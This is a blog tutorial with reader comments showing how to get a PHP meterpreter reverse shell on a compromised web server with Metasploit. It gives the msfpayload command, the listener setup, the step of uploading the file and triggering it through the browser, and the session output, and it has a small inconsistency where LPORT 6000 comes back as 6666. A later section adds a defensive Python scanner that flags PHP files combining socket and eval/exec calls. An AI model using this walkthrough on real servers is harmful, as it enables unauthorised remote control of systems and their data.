Php reverse shell with metasploit


After hacking a web application or server to the extent that you can upload files to it, the next thing to try is to get a proper shell on the system. The most common approach is to create a reverse shell: first a listener program is run on the hacker's machine, and then a program/payload/script is run on the target machine so that it connects back to the hacker's machine and offers a shell/terminal.

Creating reverse shells using php scripts is generally quite easy and can be accomplished with just a small php script and a program like netcat. Netcat would run as the listener (a socket server, actually) and the php script has to be run on the victim server so that it connects back.

In this example we are going to create a reverse shell in php using metasploit. Yes, it's too big a tool for such a small task, but it looks cool anyway.

To recap the basics, a reverse shell has 2 components. First is the listener on the local/hacker system that waits for incoming connections, and the second is the payload script/program that runs on the target computer and is configured to connect to the listener and offer a shell.

listener (hacker machine) <===== reverse shell payload (victim machine)

Once the listener receives the connection, it gets a shell which can be used to run any command (limited to the user's privileges) on the target system.

php payload

So the first step is to create our payload program. This is done using the msfpayload command and looks like this:

# msfpayload php/meterpreter/reverse_tcp LHOST=192.168.1.4 LPORT=6000 R > exploit.php

The above command creates a file called exploit.php, which is the reverse shell payload. It is just a plain php script that is configured according to the LHOST and LPORT parameters.

Now upload exploit.php to the target system. Wait, do not run it yet. First we need to start the listener as shown in the next step.

Start listener

Once the payload is uploaded, the next thing to do is to start our listener, which will catch the incoming connection. Start msfconsole and run the following commands:

msf > use exploit/multi/handler 
msf  exploit(handler) > set LHOST 192.168.1.4
LHOST => 192.168.1.4
msf  exploit(handler) > set LPORT 6000
LPORT => 6666
msf  exploit(handler) > set payload php/meterpreter/reverse_tcp 
payload => php/meterpreter/reverse_tcp
msf  exploit(handler) > exploit

[*] Started reverse handler on 192.168.1.4:6000 
[*] Starting the payload handler...

Now the listener is ready, and it's time to run the php script on the server. It is already uploaded, and can be run by opening it from the browser like a normal url:

http://targetmachine/some/path/exploit.php

As soon as the script starts running, msfconsole will indicate the connection and a meterpreter session will come up:

[*] Sending stage (39217 bytes) to 192.168.1.101
[*] Meterpreter session 1 opened (192.168.1.4:6000 -> 192.168.1.101:43400) at 2013-03-04 17:29:18 +0530

meterpreter >

Now that meterpreter is up, it's time to play with the system.
Since it is a php based reverse shell, it is not dependent on the target platform OS in any way and can run on windows and linux alike.
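From the defender's side, the property described above (a plain php file dropped into the web root that opens an outbound socket and then executes whatever it receives) is exactly the shape a file scan of upload directories can look for. The following is an added example, not part of the original post or of Metasploit: a heuristic Python scanner that flags php files combining an outbound-connection function with a dynamic-execution function. The function lists, verdict names and the two sample files are constructed assumptions, not real payloads.

```python
import re
from pathlib import Path

# Heuristic function families (assumed lists, not exhaustive): a php reverse
# shell stager needs an outbound connection plus dynamic code execution.
NET_FUNCS = ("fsockopen", "pfsockopen", "socket_create",
             "socket_connect", "stream_socket_client")
EXEC_FUNCS = ("eval", "assert", "create_function", "shell_exec",
              "system", "passthru", "exec", "popen", "proc_open")


def _calls(src, names):
    """Return the names from `names` that appear as calls (name followed by '(').
    The lookbehind stops 'exec(' from matching inside 'shell_exec(' and
    skips variables such as '$eval('. PHP function names are case-insensitive."""
    return [n for n in names
            if re.search(r"(?<![\w$])" + re.escape(n) + r"\s*\(", src, re.IGNORECASE)]


def assess_php(src):
    """Classify one php source text: 'reverse-shell-like' when both a network
    call and an execution call are present, 'suspicious-exec' for execution
    calls alone, otherwise 'clean'."""
    net, execs = _calls(src, NET_FUNCS), _calls(src, EXEC_FUNCS)
    if net and execs:
        verdict = "reverse-shell-like"
    elif execs:
        verdict = "suspicious-exec"
    else:
        verdict = "clean"
    return {"net": net, "exec": execs, "verdict": verdict}


def scan_tree(root, pattern="*.php"):
    """Walk a directory (e.g. an upload folder) and return non-clean findings."""
    hits = {}
    for p in Path(root).rglob(pattern):
        result = assess_php(p.read_text(errors="ignore"))
        if result["verdict"] != "clean":
            hits[str(p)] = result
    return hits


# Constructed samples: a benign DB helper and a deliberately non-functional
# stub that only has the fsockopen + eval shape described in the text.
BENIGN = "<?php\n$db = new mysqli('localhost', 'app', 'pw', 'shop');\necho $db->query('SELECT 1')->num_rows;\n"
SUSPECT = "<?php\n$s = fsockopen(LHOST, LPORT);\neval($stage);\n"

if __name__ == "__main__":
    for name, src in (("benign.php", BENIGN), ("exploit.php", SUSPECT)):
        print(name, assess_php(src))
```

Pair the file scan with an egress check: a web server process opening its own outbound TCP connection to an unusual port (6000 in this walkthrough) is the network-side symptom of the same stager.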

Last Updated On : 4th March 2013


  • Awn Umar

    Do we need to port forward port 6000?

    • sdfv

      If you are behind NAT, yes.

  • Ram

    msf exploit(handler) > set LPORT 6000
    LPORT => 6666
    ?????
